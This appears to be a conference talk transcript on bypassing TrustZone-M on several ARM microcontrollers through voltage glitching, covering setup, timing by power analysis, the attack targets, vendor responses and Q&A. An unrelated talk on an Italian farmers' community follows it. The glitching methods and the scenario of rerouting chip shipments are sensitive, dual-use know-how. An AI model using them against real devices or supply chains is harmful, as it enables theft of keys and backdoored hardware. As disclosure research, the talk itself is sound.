So for example, if you have a display and a crypto engine and so on, you can decide whether these peripherals should be secure or nonsecure. And so let's talk about these two security states, secure and nonsecure. Well, if you have code running in secure flash or you have secure code running, it can call anywhere into the nonsecure world. It's basically the highest privilege level you can have and so there's no protection there. However, the opposite, if we try to go from the nonsecure world into the secure world, would be insecure because, for example, you could jump to the parts of the code that are behind certain protections and so on. And so that's why if you try to jump from nonsecure code into secure code, it will cause an exception. And to handle that, there's a third memory state which is called nonsecure callable. And as the name applies, basically your nonsecure code can call into the nonsecure callable code. More specifically, it can only call to nonsecure callable code addresses where there's an SG instruction which stands for secure gateway. And the idea behind the secure gateway is that if you have a nonsecure kernel running, you probably also have a secure kernel running. And somehow this secure kernel will expose certain system calls, for example. And so we want to somehow call from the nonsecure kernel into these system calls. But as I've just mentioned, we can't do that because this will, unfortunately, cause an exception. And so the way this is handled on trust zone M is that you create so-called secure gateway veneer functions. These are very short functions in the nonsecure callable area. And so if we want, for example, to call the load key system call, we would call the load key veneer function, which in turn would call the real load key function. And these veneer functions are super short. So if you look at this assembly of them, it's like two instructions. It's a secure gateway instruction and then a branch instruction towards your real function. And so if we combine this, we end up with this diagram. Secure can call into nonsecure. Secure can call into NSC and NSC can call into the secure world. But how do we manage these memory states? How do we know what security status and address have? And so for this, in trust zone M, we use something called attribution units. And by default, there are two attribution units available. The first one is the SAU, the security attribution unit, which is standard across chips. It's basically defined by ARM how you use this. And then there's the IDAU, the implementation defined attribution unit, which is basically custom to the silicon vendor, but can also be the same across several chips. And to get the security state of the address, the security attribution of both the SAU and the IDAU are combined. And whichever one has the higher privilege level will basically win. And so let's say our SAU says this address is secure, and our IDAU says this address is nonsecure. The SAU wins because it's the highest privilege level. And basically, our address will be considered secure. This is a short table. If both the SAU and the IDAU agree, we will be nonsecure. If both say, hey, this is secure, it will be secure. However, if they disagree and the SAU says, hey, this address is secure, the IDAU says yes, it's nonsecure. It will still be secure because secure is the higher privilege level. The opposite is true. And even with nonsecure callable, secure is more privileged than NSC. And so the secure will win. But if we mix NS and NSC, we get nonsecure callable. OK. My initial hypothesis when I read all of this was if we break or disable the attribution units, we probably break the security. And so to break these, we have to understand them. And so let's look at the SAU, the security attribution unit. It's standardized by ARM. It's not available on all ships. And it basically allows you to create memory regions with different security states. So for example, if the SAU is turned off, everything will be considered secure. And if we turn it on, but no regions are configured, still everything will be secure. We can then go and add, for example, address ranges and make them NSC or nonsecure and so on. And this is done very, very easily. You basically have these five registers. You have the SAU control register where you basically can turn it on and off. You have the SAU type, which gives you the number of supported regions on your platform because this can be different across different ships. And then we have the region number register, which you use to select the region you want to configure. And then you set the base address and the limit address. And that's basically it. So for example, if we want to set region zero, we simply set the R&R register to zero. Then we set the base address to 0x1000. We set the limit address to 0x1fe0, which is identical to 1fff because there are some other bits behind there that we don't care about right now. And then we turn on the security attribution unit and now our memory range is marked as secure. If you want to create a second region, we simply change R&R to, for example, 1. Again insert some nice addresses, turn on the SAU, and we have a second region this time from 4,000 to 5fff. So to summarize, we have three memory security states. We have S secure and we have NSC non-secure callable and we have NS non-secure. We also have the two attribution units, the SAU, standard by ARM, and the IDAU, which is potentially custom. We will use SAU and IDAU a lot, so this was very important. Cool. Let's talk about fault injection. So as I've mentioned, we want to use fault injection to compromise trust zone. And the idea behind fault injection or as it's also called glitching is to introduce faults into your chip. So for example, you cut the power for a very short amount of time or you change the period of the clock signal or even you could go and inject electromagnetic shocks in your chip. You can also shoot at it with laser and so on and so forth. Lots of ways to do this. And the goal of this is to cause undefined behavior. And in this talk, we will specifically look at something called voltage glitching. And so the idea behind voltage glitching is that we cut the power to the chip for a very, very short amount of time at a very precisely timed moment. And this will cause some interesting behavior. So basically, if you would look at this on an oscilloscope, we would basically have a stable voltage, stable voltage, stable voltage, and then suddenly it drops and immediately returns. And this drop will only be a couple of nanoseconds long. And so for example, you can have glitches that are 10 nanoseconds long or 15 nanoseconds long and so on. Depends on your chip. And yeah. And this allows you to do different things. So for example, a glitch can allow you to skip instructions. It can corrupt flash reads or flash writes. It can corrupt memory register or register reads and writes. And skipping instructions for me is always the most interesting one because it allows you to directly go from disassembly to understanding what you can potentially jump over. So for example, if we have some code, this would be a basic firmware boot up code. We have an initialized device function. And we have a function that basically verifies the firmware that's in flash. And then we have this Boolean check where our firmware is valid. And now if we glitch at just the right time, we might be able to glitch over this check and boot our potentially compromised firmware, which is super nice. So how does this relate to a trust zone? Well, if we managed to glitch over an able trust zone, we might be able to break trust zone. So how do you actually do this? Well, we need something to wait for a certain delay and generate a pulse at just the right time with very high precision. We're talking about nanoseconds here. And we also need something to drop the part to the target. And so if you need precise timing and so on, what works very well is an FPGA. And so for example, the code that I'll release as part of this all runs on the LASUS iStick, which is roughly 30 bucks, and you need a cheap MOSFET. And so together, this is like $31 of equipment. And on a setup site, this looks something like this. You would have your FPGA, which has a trigger input. And so for example, if you want to glitch something during the boot up of a chip, you could connect this to the reset line of the chip. And then we have an output for the glitch pulse. And then if we hook this all up, we basically have our power supply to the chip, run over a MOSFET, and then if the glitch pulse goes high, we drop the power to ground, and the chip doesn't get power for a couple of nanoseconds. Let's talk about this power supply, because a chip has a lot of different things inside of it. So for example, a microcontroller has a CPU core. We have a Wi-Fi peripheral. We have GPIO. We might have Bluetooth and so on. And often these peripherals run at different voltages. And so while our microcontroller might just have a 3.3 volt input, internally, there are a lot of different voltages at play. And the way these voltages are generated often is using in-chip regulators. And basically, these regulators connect to the 3.3 voltage in and then generate the different voltages for the CPU core and so on. But what's nice is that on a lot of chips, there are behind the core regulator so-called bypass capacitors. And these external capacitors are basically there to stabilize the voltage, because regulators tend to have a very noisy output, and you use the capacitor to make it more smooth. But if you look at this, this also gives us direct access to the CPU core power supply. And so if we just take a heat gun and remove the capacitor, we actually kind of change the pinout of the processor, because now we have a 3.3 voltage in. We have a point to input the core voltage. And we have ground. So we basically gained direct access to the internal CPU core voltage rails. The only problem is these capacitors are there for a reason. And so if we remove them, your chip might stop working. But very easy solution. You just hook up a power supply to it, set it to 1.2 volts or whatever, and then suddenly it works. And this also allows you to glitch very easily. You just glitch on your power rail towards the chip. And so this is our current setup. So we have the lattice-i-stick. We also use a multiplexer as an analog switch to cut the power to the entire device if we want to reboot everything. We have a MOSFET, and we have a power supply. Now hooking this all up on a breadboard is fun the first time. It's OK the second time, but the third time it begins to really, really suck. And as soon as something breaks with like 100 jumper wires on your desk, the only way to debug it is to start over. And so that's why I decided to design a small hardware platform that combines all of these things. So it has an FPGA on it. It has analog input. And it has a lot of glitch circuitry. And it's called the Mark 11. If you've read William Gibson, you might know where this is from. And it contains a Lattice i40, which has a fully open source 2-chilling thanks to Clifford Wolfe and so on. And this allows us to very, very quickly develop new triggers, develop new glitch code and so on. And it makes compilation and everything really, really fast. It also comes with three integrated power supplies. So we have a 1.2-volt power supply, 3.35 volts and so on. And you can use it for a DPA. And this is based around some existing devices. So for example, the FPGA part is based on the 1-bit squared icebreaker. The analog front end, thanks to Colin O'Flynn, is based on the chip whisperer Nano. And then the glitch circuit is basically what we've been using on breadboards for quite a while, just combined on a single device. And so unfortunately, as always with hardware, production takes longer than you might assume. But if you drop me a message on Twitter, I'm happy to send you a PCB as soon as they work well, and the bomb is around 50 bucks. Cool. So now that we are ready to actually attack chips, let's look at an example. So the very first chip that I encountered that you trust on M was the microchip Sem L11. And so this chip was released in June 2018. And it's kind of a small, slow chip. It runs at 32 megahertz. It has up to 64 kilobytes of flash and 16 kilobytes of S-RAM. But it's super cheap. It's like $1.80 at quantity one. And so it's really nice, really affordable. And we had people come up to us and suggest, hey, I want to build a TPM on top of this, or I want to build a hardware wallet on top of this, and so on and so forth. And if we look at the website of this chip, it has a lot of security in it. So it's the best contribution to IoT security winner of 2018. And if you just type secure into the word search, you get like 57 hits. So this chip is 57 secure. And even on the website itself, you have like chip level security. And then if you look at the further descriptions, you have robust chip level security, including chip level temper resistance, active shield, protects against physical attacks, and resist micro probing attacks. And even in the datasheet, where I got really worried was, because I said I do a lot with a core voltage, it has a brownout detector that has been calibrated in production and must not be changed and so on. Yeah, to be fair, when I talked to Microchip, they mentioned that they absolutely want to communicate that this chip is not hardened against hardware attacks. But I can see how somebody who looks at this would get the wrong impression given all the terms and so on. Anyway, so let's talk about the trust zone in this chip. So the sem11 does not have a security attribution unit. Instead, it only has the implementation defined attribution unit. And the configuration for this implementation defined attribution unit is stored in the user row, which is basically the configuration flash. It's also called fuses in the datasheet sometimes, but it's really, I think it's flash based. I haven't checked, but I'm pretty sure it is because you can read it, write it, change it, and so on. And then the IDAU, once you've configured it, will be configured by the boot ROM during the start of the chip. And the idea behind the IDAU is that all your flash is partitioned into two parts. You have the boot loader part and the application part. And both of these can be split into secure, non-secure, callable, and non-secure. So you can have a boot loader, a secure, and a non-secure one, and you can have an application, a secure, and a non-secure one. And the size of these regions is controlled by these five registers. And for example, if we want to change our non-secure application to be bigger and make our secure application a bit smaller, we just fill it with these registers and the sizes will adjust. And the same with the boot loader. So this is pretty simple. How do we attack it? My goal initially was I want to somehow read data from the secure world while running code in the non-secure world. So jump the security gap. My code in non-secure should be able to, for example, extract keys from the secure world. And my attack path for that was, well, I glitched the boot ROM code that loads the IDAU configuration. But before we can actually do this, we need to understand, is this chip actually glitchable? And is it susceptible to glitches or do we immediately get thrown out? And so I used a very simple setup where I just had a firmware and tried to glitch out of a loop and enable an LED. And I had success in less than five minutes. And super stable glitches almost immediately. Like, when I saw this, I was 100% sure that I messed up my setup or that the compiler optimized out my loop or that I did something wrong because I never glitched the chip in five minutes. And so this was pretty awesome. But I also spent another two hours verifying my setup. So okay, cool. We know this chip is glitchable. So let's glitch it. What do we glitch? Well, if we think about it, somewhere during the boot ROM, these registers are read from Flash and then some hardware is somehow configured. We don't know how because we can't dump the boot ROM. We don't know what's going on in the chip. And the datasheet has a lot of pages and I'm a millennial. So I read what I have to read and that's it. But my basic idea is if we somehow manage to glitch the point where it tries to read the value of the AS register, we might be able to set it to zero because most chip peripherals will initialize to zero. And if we glitch over the instruction that reads AS, maybe we can make our non-secure application bigger so that actually we can read the secure application data because now it's considered non-secure. But problem one, the boot ROM is not dumpable. So we cannot just disassemble it and figure out when does it roughly do this. And the problem two is that we don't know when exactly this reader cures and our glitch needs to be instruction precise. We need to hit just the right instruction to make this work. And the solution is brute force. But I mean, like, nobody has time for that, right? So if the chip boots for two milliseconds, that's a long range we have to search for glitches. And so very easy solution, power analysis. And it turns out that, for example, RISCure has done this before where basically they tried to figure out where in time a JTEC lock is set by comparing the power consumption. And so the idea is we basically write different values to the AS register. Then we collect a lot of power traces. And then we look for the differences. And this is relatively simple to do if you have a chip whisperer. So this was my rough setup. So we just have the chip whisperer light. We have a breakout with the chip we want to attack and a programmer. And then we basically collect a couple of traces. And in my case, even just 20 traces are enough, which takes, I don't know, like half a second to run. And if you have 20 traces in unsecure mode, 20 traces in secure mode, and you compare them, you can see that there are clear differences in the power consumption starting at a certain point. And so I wrote a script that does some more statistics on it and so on. And that basically told me the best glitch candidate starts at 2.18 milliseconds. And this needs to be so precise because as I said, we're in the nanosecond range. And so we want to make sure that we have the right point in time. Now how do you actually configure, how do you build this setup where basically you get a success indication once you broke this? For this, I needed to write a firmware that basically attempts to read secure data. And then if it's successful, it enables a GPIO. And if it fails, it does nothing. And I just reset and try again. And so I knew my rough delay and I was triggering off the reset of the chip. Then I just tried any delay after it and tried different glitch pulse lengths and so on. And eventually I had a success. And these glitches, you will see with the glitches we released a while back, are super easy to write because all you have is like 20 lines of Python. You basically set up a loop, delay from, delay to. You set up the pulse length. You iterate over a range of pulses. And then in this case, you just check whether your GPIO is high or low. That's all it takes. And then once you have this running in a stable fashion, it's amazing how fast it works. So this is now a recorded video of a live glitch, of a real glitch, basically. And you can see we have like 20 attempts per second. And after a couple of seconds, we actually get a success indication. We just broke a chip. Sweet. But one thing, I moved to a part of Germany to the very south. It's called the Schwabenland. And I mean 60 bucks. We are known to be very cheap. And 60 bucks translates to like six beers at Oktoberfest. Just to convert this to the local currency, that's like 60 Klubmarte. Unacceptable. We need to go cheaper. Much cheaper. And so... What if we take a chip that's 57 secure, and we try to break it with the smallest chip? And so this is an 80 tiny, which costs like, I don't know, a euro or two euro. We combine it with a MOSFET to keep the comparison that's roughly three Klubmarte. And we hook it all up on a jumper board. And turns out this works. You can have a relatively stable glitch with like 120 lines of assembly running on the 80 tiny. And this will glitch your chip successfully and can break trust zone on the SEM11. The problem is, chips are very complex. And it's always very hard to do an attack on a chip that you configured yourself. Because as you will see, chances are very high that you messed up the configuration. And for example, missed the security bit, forgot to set something, and so on and so forth. But luckily, in the case of the SEM11, there's a version of this chip, which is already configured and only ships in non-secure mode. And so this is called the SEM11KPH. And so it comes pre-provisioned with a key. And it comes pre-provisioned with a trusty execution environment already loaded into the secure part of the chips. And it chips completely secured. And the customer can write and debug non-secure code only. And also you can download the SDK for it and write your own trustlets and so on. But I couldn't because it requires you to agree to their terms and conditions, which exclude reverse engineering, so no chance, unfortunately. But anyway, this is the perfect example to test our attack. You can buy these chips on DikiKey and then try to break into the secure world. Because these chips are hopefully decently secured and have everything set up and so on. And yeah, so this was the setup. We designed our own breakout board for the SEM11, which makes it a bit more accessible, has JTAC and has no capacitors in the way, so you get access to all the core voltages and so on. And you have the FPGA on the top left, the super cheap 20 bucks power supply, and a programmer. And then we just implemented a simple function that uses OpenOCD to try to read an address that we normally can't read. So we basically glitch, then we start OpenOCD, which uses the JTAC adapter to try to read secure memory. And so hooked it all up, wrote a nice script, and let it rip. And so after a while or well a couple of seconds, immediately again got successful, got a successful attack on the chip and more and more. And you can see just how stable you can get these glitches and how well you can attack this. Yeah, so sweet. Hacked. We can compromise the root of trust and the trust execution environment. And this is perfect for supply chain attacks, right? Because if you can compromise a part of the chip that the customer will not be able to access, he will never find you. But the problem with supply chain attacks is they're pretty hard to scale and they're only for sophisticated actors normally and far too expensive is what most people will tell you. Except if you hacked the distributor. And so as I guess last year or this year, I don't know, I actually found a vulnerability in DigiKey which allowed me to access any invoice on DigiKey, including the credentials you need to actually change the invoice. And so basically the buck is that they did not check when you basically requested an invoice, they did not check whether you actually had permission to access it. And you have the web access ID on top and the invoice number and that's all you need to call DigiKey and change the delivery basically. And so this also is all data that you need to reroute the shipment. I disclosed this, it's fixed. It's been fixed again afterwards and now hopefully this should be fine. So I feel good to talk about it. And so let's walk through the scenario. We have Eve and we have DigiKey and Eve builds this new super sophisticated IOT toilet and she needs a secret chip. So she goes to DigiKey and orders some SEM L11 KPHs and her Mallory. Mallory scans all new invoices on DigiKey and as soon as somebody orders a SEM L11, they talk to DigiKey via the API or via a phone call to change the delivery address. And because you know who the chips are going to, you can actually target this very, very well. So now the chips get delivered to Mallory, Mallory back to us the chips and then sends the backdoor chips to Eve who is non-deviser because it's the same career, it looks the same. You have to be very, very mindful of these types of attack to actually recognize them. And even if they open the chips and they, sorry, they open the package and they try the chip, they scan everything they can scan, the backdoor will be in a part of the chip that they cannot access. And so we just supply chain attacked whoever using a UPS envelope basically. So yeah, interesting attack for Vector. So I talked to Microchip and it's been great. They've been super nice. It was really a pleasure. I also talked to Trustonic who were very open to this and wanted to understand it. And so it was great. And they explicitly state that this chip only protects against software attacks. While it has some hardware features like temporary system RAM, it is not built to withstand fault injection attacks. And even if you compare now different revisions of the data sheet, you can see that as some data sheets, the early ones, like mentioned some fault injection resistance and it's now gone from the data sheet. And they are also asking for feedback on making it more clear what this chip protects against, which I think is a noble goal because we all know marketing versus technicians is always interesting fight, let's say. Cool. First chip broken. Time for the next one, right? So the next chip I looked at was the new micro M2351, it's a Cortex M23 processor. It has trust on M. And I was super excited because this finally has an SAU, a security attribution unit and an IDAU. And also I talked to them marketing. It explicitly protects against fault injection. So that's awesome. I was excited. Let's see how that turns out. Let's briefly talk about the trust zone in the new boat on chip. So as I've mentioned before, the SAU, if it's turned off or turned on without regions, will be to fully secure. And no matter what the IDAU is, the most privileged level always wins. And so if our entire security attribution unit is secure, our final security state will also be secure. And so if we now add some small regions, the final state will also have the small non-secure regions. And I mean, I saw this, looked at how this code works. And you can see that at the very bottom, SAU control is set to one. Simple, right? We glitch over the SAU enabling and all our code will be secure and we'll just run our code in secure mode. No problem is what I thought. And so basically the secure boot loader starts execution of non-secure code. We disable the SAU by glitching over the instruction and now everything is secure. So our code runs in a secure world. It's easy. Except read the fucking manual. So it turns out these thousands of pages of documentation actually contain useful information. And you need a special instruction to transition from secure to non-secure state, which is called BLXNS, which stands for branch optionally linked and exchange to non-secure. This is exactly made to prevent this. It prevents accidentally jumping into non-secure code. It will cause a secure fault if you try to do it. And what's interesting is that even if you use this instruction, it will not always transition the state. It depends on the last bit in the destination address, whether the state is transitioned. And the way the boot loader will actually get its address, it jumps to is from what's called the reset table, which is basically where your reset handlers are, where your stack pointer, your initial stack pointer is, and so on. And you will notice that the last bit is always set. And if the last bit is set, it will jump to secure code. So somehow they managed to branch to this address and run it into non-secure. And so how do they do this? They use an explicit bit clear instruction. What do we know about instructions? We can glitch over them. And so basically we can, with two glitches, we can glitch over the SIU control enable. Now our entire memory is secure, and then we glitch over the bit clear instruction. And then branch linked X non-secure, again rolls off the tongue, will run secure code. And now our normal world code is running in secure mode. The problem is, works, but it's very hard to get stable. So I mean, this was, I somehow got it working, but it was not very stable, and it was a big pain to actually make use of. So I wanted a different vulnerability. And I read up on the implementation defined attribution unit of the M2351, and it turns out that each flash, RAM, peripheral, and so on is mapped twice into memory. And so basically once as secure as the address 0x2000, and once as non-secure at the address 0x3000. And so you have the flash twice, and you have the RAM twice. This is super important. This is the same memory. And so I came up with an attack that I call crow arbar, because a vulnerability basically doesn't exist if it doesn't have a fancy name. And the basic point of this is that the security of the system relies on the region configuration of the SIU. But if we glitch this initialization combined with this IDAU layout, again, the IDAU mirrors the memory as it wants as secure and wants as non-secure. Now let's say we have at the very bottom of our flash, we have a secret, which is in the secure area. It will also be in the mirror of this memory. But again, because our SIU configuration is fine, it will not be accessible by the non-secure region. So the star of this non-secure area is configured by the arbar register. And so maybe if we glitch this arbar being set, we can increase the size of the non-secure area. And if you check the ARM documentation on the arbar register, the reset value state of this register is unknown. So unfortunately, it doesn't just say zero, but I tried this on all chips I had access to, and it's zero on all chips I tested. And so now what we can do is we glitch over this arbar, and now our final security state will be bigger. And our secure code is still running in the bottom half, but then the jump into non-secure will also give us access to the secret. And it works. We get a fully stable glitch, takes roughly 30 seconds to bypass it. I should mention that this is what I think happens. All I know is that I inject the glitch and I can read the secret. I cannot tell you exactly what happens, but this is the best interpretation I have so far. So woohoo, we have an attack with a cool name. And so I looked at another chip called the NXP LPC55S69. And this one has two Cortex M33 cores, one of which has Trason M. The IDAU and the overall Trason layout seem to be very similar to the new Micro. And I got the dual glitch attack working and also the crow arbar attack working. And the vendor response was amazing. Like holy crap, they called me and wanted to fully understand it. They reproduced it. They got me on the phone with an expert. And the expert was super nice, but what the set came down to was our TFM. But again, this is a long document, but it turns out that the example code did not enable a certain security feature. And this security feature is helpfully named miscellaneous control register, basically. Which stands for secure control register. Obviously. And this register has a bit, if you set it, it enables secure checking. And if I read just a couple of sentences further when I read about the trust zone on the chip, I would have actually seen this, but millennial, sorry. And so what this enables is called the memory protection checkers. And this is an additional memory security check that gives you final control over the memory layout. And so it basically checks if the attribution unit security state is identical with the memory protection checker security state. And so, for example, if our attack code tries to access memory, the MPC will check whether this was really a valid request, so to say, and stop you if you are unlucky, as I was. But turns out it's glitchable, but it's much, much harder to glitch. And you need multiple glitches. And the vendor response was awesome. They are also, as I heard, working on improving the documentation for this. So yeah, super cool. But still, it's not a full protection against glitching, but it gives you certain security, and I think that's pretty awesome. Before we finish, is everything broken? No. These chips are not insecure. They are not protected against a very specific attack scenario. And align the chips that you want to use with your threat model. If fault injection is part of your threat model, so for example, you're building a car key, maybe you should protect against glitching. If you're building a hardware wallet, definitely you should protect against glitching. Thank you. Also, by the way, if you want to play with some awesome fault injection equipment, I have an EMFI glitcher with me and so on, so just hit me up on Twitter and I'm happy to show it to you. So, thanks a lot. Thank you very much, Thomas. We do have an awesome 15 minutes for Q&A. So if you line up, we have three microphones. Microphone number three actually has an induction loop, so if you're hearing impaired and have a suitable device, you can go to microphone three and actually hear the answer. And we're starting off with our signal angel with questions from the Internet. Hello Internet. Hello. Are you aware of the STS cortex and for firewall and can you research, be somehow related to it or maybe do you have plans to explore it in the future? Yes, I'm very aware of the STM32F4. If you watched our talk last year at CCC called wallet.fail, we actually exploited the sister chip, the STM32F2. The F4 has this strange firewall thing which feels very similar to trustonem. However, I cannot yet share any research related to that chip. Unfortunately, sorry. Thank you. Microphone number one, please. I'm just wondering, have you tried to replicate this attack on multi-core CPUs with higher frokinesc such like 2Ghz and or if not, how would you go about that? So I have not because there are no trustonem chips with this frequency. However, people have done it on mobile phones and other equipment. So for example, yeah, there are a lot of materials on glitching higher frequency stuff, but yeah, it will get expensive really quickly because a scope, the way you can even see a 2GHz clock, that's a nice car on a scope. Microphone number two, please. Thank you for your talk. Is the firmware functionality to go from non-secure to secure area? Are there same-sys, defined functionalities or are there preparatory libraries from NXP or other? So the veneer stuff is standard and you will find ARM documents basically recommending you to do this, but all the tool chains, for example, the one for the SEM11 will generate the veneers for you. And so I have to be honest, I have not looked at how exactly they are generated. However, I did some rust stuff to play around with it and yeah, it's relatively simple for the tool chain and its standard. The signal angel is signaling. Yeah, that's not a question from the internet, but from me and I wanted to know how important is the hardware security in comparison to the software security because you cannot hack these devices without having physical access to them except of this supply chain attack. Exactly. And that depends on your threat model. So that's basically, if you build a hardware wallet, you want to have hardware protection because somebody can steal it potentially very easily. And if you, for example, look at your phone, you probably maybe don't want to have anyone at customs be able to immediately break into your phone. And that's another point where hardware security is very important. And there, with the car key, it's the same. If you rent a car, you hopefully, the car rental company doesn't want you to copy the key. And interestingly, probably one of the most protected things in your home is your printer cartridge because I can tell you that the vendor invests a lot of money into you not being able to clone the printer cartridge. And so there are a lot of cases where it's maybe not the user who wants to protect against hardware attacks, but it's the vendor who wants to protect against it. Microphone number one, please. So thank you again for the amazing talk. You mentioned higher order attacks, I think twice. And for the second chip, you actually said you broke it with two glitches, two exploitable glitches. Yes. So what did you do to reduce the search space? Or did you just search over the entire space? So the nice thing about these chips is that you can actually, you can, if you have a security distribution unit, you can decide when you turn it on because you can just, so I had a GPIO go up, then I enabled the SU, and then I had my search space very small because I knew it would be just after I pulled up the GPIO. And so I was able to very precisely time where I glitched. And I was able, because I wrote the code basically that does it, I could almost count on the oscilloscope which instruction I'm hitting. All right. Thank you. Next question from microphone number two, please. Yeah. Thank you for the talk. I was just wondering if the vendor was to include the capacitor directly on the die, how fixed would you consider it to be? So against voltage glitching, it might help, it depends. But for example, on a recent chip, we just used negative voltage to suck out the power from the capacitor. And also you will have EMFI glitching as a possibility. And EMFI glitching is awesome because you don't even have to solder. You just basically put a small coil on top of your chip and inject the voltage directly into it behind any of the capacitors and so on. So it helps, but it's not a, often it's not done for security reasons, let's say. Next question again from our signal angel. Did you get to use your own custom hardware to help you? I partially. The part that worked is the summary. Microphone number one, please. Hi. Thanks for the interesting talk. All these vendors pretty much said this sort of attack is sort of not really in scope for what they're doing. Yes. Are you aware of anyone like in this sort of category of chip actually doing anything against glitching attacks? Not in this category, but there are CQ elements that explicitly protect against it. A big problem with researching those is that it's also to a large degree security by NDA, at least for me, because I have no idea what's going on. I can't buy one to play around with it. And so I can't tell you how good these are, but I know from some friends that there are some chips that are very good at protecting against glitches. And apparently the term you need to look for is called glitch monitor. And if you see that in the datasheet, that tells you that they at least thought about it. Number two, please. So what about a brownout detection at that microchip? Say why it didn't catch your glitching attempts. It's not made to glitch it, to catch glitching attacks, basically. A brownout detector is mainly there to keep your chips stable. And so for example, if your supply voltage drops, you want to make sure that you notice and don't accidentally glitch yourself. So for example, if it's running on a battery and your battery goes empty, you want your chip to run stable, stable, stable off. And that's the idea behind a brownout detector, is my understanding. But yeah, they are not made to be fast enough to catch glitching attacks. Do we have any more questions from the hall? Yes. Yes, where? Thank you for your amazing talk. You have shown that it gets very complicated if you have two consecutive glitches. So wouldn't it be an easy protection to just do the stuff twice or three times and maybe randomize it? Would you consider this then impossible to be glitched? So adding randomization to the point in time where you enable it helps, but then you can trigger off the power consumption and so on. And I should add, I only try to trigger once and then use just a simple delay. But in theory, if you do it twice, you could also glitch on the power consumption signature and so on. So it might help, but somebody very motivated will still be able to do it probably. Okay, we have another question from the internet. Is there a mitigation for such attack that I can do on PCB level or it can be addressed only on chip level? Only on chip level, because if you have a heat gun, you just pull the chip off and do it in a socket, or if you do EMFI glitching, you don't even have to touch the chip. You just go over it with the coil and inject directly into the chip. So the chip needs to be secured against this type of stuff. Or you can add a temper protection case around your chip. So yeah. Another question from microphone number one. So I was wondering if you've heard anything or no thing about the SGM32L5 series? I've heard a lot. I've seen nothing. So yes, I've heard about it, but it doesn't chip yet as far as I know. We are all eagerly awaiting it. Thank you. Microphone number two, please. Okay, very good talk. Thank you. Will you release all the hardware design of the board on the scripts? Yes. Is there anything already available, even if I understood it's not all finished? Yes, so on chip.fail, there are.fail domains, it's awesome. Chip.fail has the source code to our Glitcher. I've also ported it to the Lattice and I need to push that hopefully in the next few days. But then all the hardware will be open sourced also because it's based on open source hardware. And yeah, not planning to make any money or anything using it. It's just to make life easier. Microphone number two, please. So you said already you don't really know what happens at the exact moment of the glitch and you were lucky that you skipped an instruction. Maybe do you have a feeling what is happening inside the chip at the moment of the glitch? So I asked this precise question, what exactly happens to multiple people? I got multiple answers. But basically my understanding is that you basically pull the voltage that it needs to set for example a register. But it's absolutely out of my domain to give an educated comment on this. I'm a breaker, unfortunately not a maker when it comes to chips. Microphone number two, please. Okay, thank you. You said a lot of the chip attack. Can you tell something about JTEC attacks? So I just have a connection to JTEC? Yeah, so for example the attack on the KPH version of the chip was basically a JTEC attack. I used JTEC to read out the chip. But I did have JTEC in normal world. However, it's possible on a lot of chips to re-enable JTEC even if it's locked. And for example, again, referencing last year's talk, we were able to re-enable JTEC on the STM32F2. And I would assume something similar is possible on this chip as well. But I haven't tried. Are there any more questions? We still have a few minutes. I guess not. Well, a big warm round of applause for Thomas Hortje.
Most modern embedded devices have something to protect: Whether it's cryptographic keys for your bitcoins, the password to your WiFi, or the integrity of the engine-control unit code for your car. To protect these devices, vendors often utilise the latest processors with the newest security features: From read-out protections, crypto storage, secure-boot up to TrustZone-M on the latest ARM processors. In this talk, we break these features: We show how it is possible to bypass the security features of modern IoT/embedded processors using fault-injection attacks, including breaking TrustZone-M on the new ARMv8-M processors. We are also releasing and open-sourcing our entire soft- and hardware toolchain for doing so, making it possible to integrate fault-injection testing into the secure development lifecycle. Modern devices, especially secure ones, often rely on the security of the underlying silicon: Read-out protection, secure-boot, JTAG locking, integrated crypto accelerators or advanced features such as TrustZone are just some of the features utilized by modern embedded devices. Processor vendors are keeping up with this demand by releasing new, secure processors every year. Often, device vendors place a significant trust into the security claims of the processors. In this talk, we look at using fault-injection attacks to bypass security features of modern processors, allowing us to defeat the latest chip security measures such as TrustZone-M on the new ARMv8 processors. After a quick introduction into the theory of glitching, we introduce our fully open-source FPGA platform for glitching: An FPGA-based glitcher with a fully open-source toolchain & hardware, making glitching accessible to a wider audience and significantly reducing the costs of getting started with it - going as far as being able to integrate glitch-testing into the Secure Development Lifecycle of a product. Then, we look at how to conduct glitching attacks on real-world targets, beyond academic environments, including how to prepare a device for glitching and how to find potential glitch targets. Afterwards, we demonstrate fault-injection vulnerabilities we found in modern, widely-used IoT/embedded processors and devices, allowing us to bypass security features integrated into the chip, such as: - Re-enabling locked JTAG - Bypassing a secure bootloader - Recovering symmetric crypto keys by glitching the AES implementation - Bypassing secure-boot - Fully bypassing TrustZone-M security features on some new ARMv8M processors We will also demonstrating how to bypass security features and how to break the reference secure bootloader of the Microchip SAM L11, one of the newest, TrustZone-M enabled ARM Cortex-M processors, using roughly $5 of equipment. After the talk, PCBs of our hardware platform will be given out to attendees.
10.5446/53150 (DOI)
Welcome everybody for our next talk, infrastructure and horizontal farmers community. I guess one thing that all of us have in common is that we all are in special communities. We want to build better communities, we want to build better infrastructure and we want to build better technology. Be it in a little hacker space in Sweden or in a theater group in France or in an NGO in Germany. That is something that unites us all. And our next speaker, Andrea, she is giving us some insights into their farming community in Italy because she has 15 years of experience with that. So I think we can all learn quite a lot. And Andrea is self-taught web developer. She graduated in communication sciences. She is also a cook and she is part of a group of radical farmers. So I would say she is a little bit of everything, a jack of all trades. So she is the best person to give us some insights. So please welcome Andrea with a big warm round of applause and enjoy the talk. Thank you very much. Thanks to you, to everyone to stay here. It will be difficult to fit in 30 minutes to explain the experience and to explain the interaction between a lot of different communities. Not only this experience in Bologna. But okay. I will speak about Campiaperti. Campiaperti means open field in Italian. And I come from Bologna. Okay. Bologna, if you imagine that this is Italy, it's here. Bologna. I'm speaking about growing vegetable, growing organic food. This is a community of farmers. It's a community of people that reclaim the rights to grow our food and decide how the territories, the land, the countryside is transformed. And so it's a direct action. There are some reclaims. We are claiming to change some law. But we are not waiting for this law in Italy to change it. But we do directly the stuff. The stuff is survive for farmers. Because the problem is that there exists only law in Italy that are for the transformers, the food, for making pizza, bread, beers and stuff. And only are made for industrial production. So the production of the farmer is there are no law for this. You can't do direct sell. But this group of farmers do this stuff. And so they have a political action in the street, in the square. And the more visible stuff that they do is do these organic markets. But it's not only this. It's political stuff. And these put their background and their roots in radical anti-capitalist group and from the global movement in the 90s. So where are these stuff happen? Happen in places that are free. Because you can't ask at the beginning 15 years ago, you can't. But also now, probably it's more difficult. You can't ask to municipality to start this kind of markets. And they found a good ground in a square in the street in place that are managed by human agreement, not law. And so Campia Parti was born in 2003, in 24, in Bolognina. That is a shared, is occupied public shared space. Self-managed by a community. It's not a service. It's a place where the needs of the community and the answer to these needs find an answer and a resolution. This place is under the 